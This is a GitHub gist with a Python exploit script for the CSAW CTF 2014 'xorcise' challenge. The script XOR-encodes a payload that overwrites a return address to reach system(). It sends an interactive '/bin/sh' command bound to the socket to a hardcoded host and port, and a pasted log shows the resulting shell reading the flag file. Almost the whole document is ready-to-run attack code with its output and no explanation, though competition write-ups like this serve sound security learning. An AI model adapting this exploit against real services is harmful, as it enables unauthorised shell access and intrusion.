/csaw_2014_xorcise.py
Created Sep 21, 2014
CSAW CTF 2014 - xorcise exploit
| #!/usr/bin/env python | |
| import struct, sys, time | |
| from nulllife import * | |
| #CSAW 2014 CTF | |
| #xorcise exploit | |
| def xor(data, key): | |
| o = '' | |
| for i in range(len(data)): | |
| o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F) | |
| return o | |
| key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system | |
| cmd = "/bin/sh -i <&4 >&4 2>&4" | |
| cmd += "\x00" * (128 - len(cmd)) | |
| s = NullSocket("128.238.66.227", 24001) | |
| s.write(chr(135) + key + xor(cmd, key)) | |
| s.interactive() | |
| ''' | |
| sh: cannot set terminal process group (134): Inappropriate ioctl for device | |
| sh: no job control in this shell | |
| sh-4.3$ id | |
| id | |
| uid=1000(xor) gid=1000(xor) groups=1000(xor) | |
| sh-4.3$ ls -la | |
| ls -la | |
| total 44 | |
| drwxr-xr-x 2 root root 4096 Sep 20 00:18 . | |
| drwxr-xr-x 3 root root 4096 Sep 14 14:14 .. | |
| -rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt | |
| -rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt | |
| -rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise | |
| -rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c | |
| sh-4.3$ cat flag.txt | |
| ceat flag.txt | |
| flag{code_exec>=crypto_break} | |
| sh-4.3$ exit | |
| exit | |
| exit | |
| *** Connection closed by remote host *** | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment